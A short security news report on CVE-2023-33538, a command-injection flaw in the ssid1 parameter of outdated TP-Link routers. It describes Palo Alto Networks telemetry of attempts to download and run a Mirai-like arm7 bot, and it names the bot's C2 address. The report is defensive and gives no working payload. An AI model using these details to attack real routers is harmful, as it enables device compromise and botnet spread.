CVE- 2023-33538 has been under attack for over a year in outdated TP-Link routers, but exploitation remains unsuccessful, according to security researchers. Hackers targeted the flaw, a command injection in the /userRpm/WlanNetworkRpm endpoint affecting models including TL-TL-WR940N v2/v4, TL-WR740N v1/v2, and TL-WR841N v8/v10, with CISA adding the issue to the KEV catalog in June 2025 and ordering fixes by 7 July 2025.
Disclosed in June 2023, the vulnerability lies in how the ssid1 parameter is processed, enabling potential code execution when exploited through crafted HTTP requests, though authentication and a limited BusyBox shell constrain practical impact. According to Palo Alto Networks, telemetry detected active, large-scale exploitation attempts around the KEV addition, including attempts to fetch a malicious arm7 binary from a remote server, set execution permissions, and run it.
The arm7 bot, linked to Mirai-like activity, communicates with a hard-coded C2 server at 51.38.137[.]113 and can distribute malware to other devices. In practice, many attacks were unauthenticated, targeted the ssid instead of ssid1, and relied on wget, which is not present in the firmware’s BusyBox environment.